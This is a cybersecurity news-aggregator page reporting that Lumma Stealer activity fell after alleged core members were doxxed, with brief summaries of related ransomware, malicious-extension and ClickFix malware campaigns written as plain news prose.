CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Lumma Stealer Activity Declines Following Doxxing of Core Members

First reported
Last updated
2 unique sources, 2 articles

Summary

Hide ▲

Lumma Stealer, a prominent information stealer, has seen a significant drop in activity over the past couple of months. This decline follows the doxxing of five alleged core group members, which exposed personal and operational details. The doxxing campaign, believed to be driven by competitors, has led to a sharp decrease in command-and-control (C&C) infrastructure activity and disrupted the group's communications. The doxxing included sensitive information such as passport numbers, bank account details, and social media profiles. The group's Telegram account was compromised on September 17, 2025, preventing effective communication with customers. As a result, cybercriminals have started seeking alternative information stealers like Vidar and StealC. The disruption has also impacted the pay-per-install (PPI) service Amadey, which was used for Lumma Stealer distribution. The doxxing campaign's consistency and depth suggest insider knowledge or access to compromised accounts and databases.

Timeline

  1. 20.10.2025 15:42 2 articles · 1d ago

    Doxxing Campaign Leads to Decline in Lumma Stealer Activity

    The doxxing campaign was carried out by cybercrime competitors, according to a Trend Micro report. The campaign targeted individuals responsible for operational oversight and technical roles associated with crypter development for malware obfuscation. The doxxing campaign included threats, accusations of betrayal within the cybercriminal community, and claims that the Lumma Stealer team had prioritized profit over operational security. The campaign's consistency and depth suggest insider knowledge or access to compromised accounts and databases. The doxxing campaign took place between August and October 2025. The Telegram accounts were compromised on September 17, 2025, further disrupting the group's ability to communicate with customers and coordinate operations.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Insight Partners Ransomware Breach Affects 12,657 Individuals

Insight Partners, a New York-based venture capital and private equity firm, has notified 12,657 individuals that their personal information was compromised in a ransomware attack. The breach, which occurred in October 2024, involved a sophisticated social engineering attack that allowed threat actors to access and encrypt servers. The stolen data includes banking and tax information, personal details of current and former employees, and information related to limited partners, funds, and portfolio companies. The company has offered complimentary credit or identity monitoring services to those affected and has filed breach notifications with state attorneys general. The incident highlights the ongoing risk of social engineering attacks and the potential for significant data exfiltration in ransomware breaches.

Open in new tab

Malicious Browser Extensions Target Meta Business Accounts

Cybersecurity researchers have identified two campaigns using fake browser extensions to hijack Meta Business accounts. The extensions, disguised as legitimate tools for Facebook and Instagram verification and ad optimization, steal session cookies and credentials. The attackers target Meta advertisers to sell hijacked accounts on underground forums or repurpose them for further malicious activities. The campaigns are linked to Vietnamese-speaking threat actors and exploit legitimate cloud services and the Chrome Web Store. The first campaign involves fake 'Meta Verified' extensions named SocialMetrics Pro, distributed via malicious ads and fake websites. The second campaign uses rogue Chrome extensions disguised as AI-powered ad optimization tools, including Madgicx Plus and Meta Ads SuperTool. Both campaigns aim to steal sensitive data and compromise Meta Business accounts.

Open in new tab

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

The FileFix social engineering attack, a variant of the ClickFix family, impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The campaign has evolved over two weeks with different payloads, domains, and lures, indicating an attacker testing and adapting their infrastructure. The FileFix technique, created by red team researcher mr. d0x, uses the address bar in File Explorer to execute malicious commands. The campaign employs steganography to hide a second-stage PowerShell script and encrypted executables inside a JPG image, which is believed to be AI-generated. The StealC malware targets credentials from various applications, cryptocurrency wallets, and cloud services, and can take screenshots of the active desktop. The FileFix attack uses a multilingual phishing site to trick users into executing a malicious command via the File Explorer address bar. The attack leverages Bitbucket to host the malicious components, abusing a legitimate source code hosting platform to bypass detection. The attack involves a multi-stage PowerShell script that downloads an image, decodes it into the next-stage payload, and runs a Go-based loader to launch StealC. The attack uses advanced obfuscation techniques, including junk code and fragmentation, to hinder analysis efforts. The FileFix attack is more likely to be detected by security products due to the payload being executed by the web browser used by the victim. The FileFix attack demonstrates significant investment in tradecraft, with carefully engineered phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact. The MetaStealer attack, a variant of the ClickFix family, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer malware. The attack involves a multi-stage infection chain that includes a DLL sideloading technique using a legitimate SentinelOne executable. The MetaStealer attack targets crypto wallets and other sensitive information, using a combination of social engineering and technical evasion techniques to deploy malware. Previously, threat actors tracked as UNC5518 leveraged a social engineering tactic called ClickFix to deploy the CORNFLAKE.V3 backdoor. The campaign used fake CAPTCHA pages to trick users into executing malicious PowerShell scripts, providing initial access to systems. This access was then monetized by other threat groups, including UNC5774 and UNC4108, which deployed additional payloads. The attack began with users interacting with compromised search results or malicious ads, leading them to fake CAPTCHA pages. Users were then tricked into running a malicious PowerShell command, which downloaded and executed the CORNFLAKE.V3 backdoor. This backdoor supported various payload types and could collect system information, which was transmitted via Cloudflare tunnels to evade detection. CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, featuring host persistence and additional payload support. The campaign also involved the deployment of WINDYTWIST.SEA, a backdoor that supports lateral movement within infected networks.

Open in new tab